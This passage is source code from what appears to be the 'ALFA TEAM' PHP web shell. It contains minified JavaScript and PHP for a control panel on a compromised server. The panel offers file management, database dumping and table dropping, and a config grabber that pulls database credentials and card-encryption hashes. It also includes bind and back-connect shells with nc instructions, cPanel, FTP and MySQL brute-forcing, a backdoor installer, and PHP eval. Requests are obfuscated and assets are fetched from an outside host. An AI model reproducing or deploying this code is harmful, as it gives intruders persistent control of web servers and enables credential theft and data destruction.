pagenum=d.querySelector(".page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie("alfa_files_page_number")),setCookie("alfa_files_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return loadPopUpDatabase(e,t),!1;"FilesMan"==a?(alfaloader("filesman_holder","none"),d.getElementsByClassName("ajaxarea")[0].innerHTML=e,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e)):((options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit())},!1,""==alfa_before_do_action_id?"."+a:alfa_before_do_action_id),alfa_before_do_action_id="",c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e?(i=$("filesman_holder")).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\'http://solevisible.com/images/loader.svg\'></div>')}else"filesman_holder"==e&&($("filesman_holder").style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fsu(e){var a=e.getAttribute("db_id");alfaloader(a,"block");for(var t={},i=0;i<e.elements.length;i++)"submit"!=e.elements[i].type&&(t[e.elements[i].name]=e.elements[i].value);for(i in mysql_cache[a])mysql_cache[a][i]=alfab64(mysql_cache[a][i]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(t))+"&c="+alfab64(c_)+"&charset="+mysql_cache[a].charset+"&type="+mysql_cache[a].type+"&sql_host="+mysql_cache[a].host+"&sql_login="+mysql_cache[a].user+"&sql_pass="+mysql_cache[a].pass+"&sql_base="+mysql_cache[a].db+"&sql_count="+mysql_cache[a].count+"¤t_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a,"update"),evalJS(e),alfaloader(a,"none")},!1,a)}function fs(f,e,el){var act_id=el.getAttribute("db_id");mysql_cache.hasOwnProperty(act_id)||(mysql_cache[act_id]={}),alfaloader(act_id,"block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache[act_id].host,user=f.sql_login?f.sql_login.value:mysql_cache[act_id].user,pass=f.sql_pass?f.sql_pass.value:mysql_cache[act_id].pass,db=f.sql_base?f.sql_base.value:mysql_cache[act_id].db,type=f.type?f.type.value:mysql_cache[act_id].type,charset=f.charset?f.charset.value:mysql_cache[act_id].charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache[act_id].count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1="4"==f?"dumpfile":"droptbl";var obj={},id=d.querySelector("#"+act_id+" .dumpfile-value"),tbl_list=d.querySelectorAll("#"+act_id+" input[name=tbl\\[\\]]");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<tbl_list.length;++i)tbl_list[i].checked&&obj.tbl.push(tbl_list[i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"¤t_mysql_id="+alfab64(act_id)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,act_id)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong> Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){".FilesMan"==a&&(a="filesman_holder");var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){d.querySelector("#rightclick_menu > a[name=newtab]").setAttribute("href","#action=fileman&path="+e.target.getAttribute("path"));var a=e.clientX,t=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(a,t),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,u=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var _=getCookie("alfa_history_files");try{for(var p in editor_files=JSON.parse(_),editor_files)insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){u=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&u?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,s="id_delete_"+e,d=$(t).getAttribute("ftype");"folder"==d&&(d="dir"),"file"==d?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+d+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+d+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+d+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+d+"')"),$(s).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",JSON.stringify(editor_files),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php echo __ALFA_SECRET_KEY__; ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(){for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&(d.files.elements[i].checked=d.files.elements[0].checked)}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};
2054</script>
2055<?php echo"<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
2056<input type='hidden' name='a' value='dlfile'>
2057<input type='hidden' name='c' value=''>
2058<input type='hidden' name='file' value=''>
2059</form>
2060<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
2061<div id='a_loader'><img src='".__showicon('loader')."'></div>";
2062$cmd_uname = alfaEx("uname -a",false,false);
2063$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
2064if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
2065echo '
2066</head>
2067<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
2068<div id="up_bar_holder"></div>
2069<div class="whole">
2070<form method="post" name="mf" style="display:none;">
2071<input type="hidden" name="a">
2072<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
2073for($s=1;$s<=10;$s++){
2074echo '<input type="hidden" name="alfa'.$s.'">';
2075}
2076echo '<input type="hidden" name="charset">
2077</form>
2078<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible"><span style="color:#42ff59;">'.__ALFA_CODE_NAME__.'</span><br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
2079<div class="header"><table width="100%" border="0">
2080<tr>
2081<td width="3%"><span class="header_vars">Uname:</span></td>
2082<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
2083</tr>
2084<tr>
2085<td><span class="header_vars">User:</span></td>
2086<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
2087<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></td>
2088</tr>
2089<tr>
2090<td><span class="header_vars">PHP:</span></td>
2091<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
2092</tr>
2093<tr>
2094<td><span class="header_vars">ServerIP:</span></td>
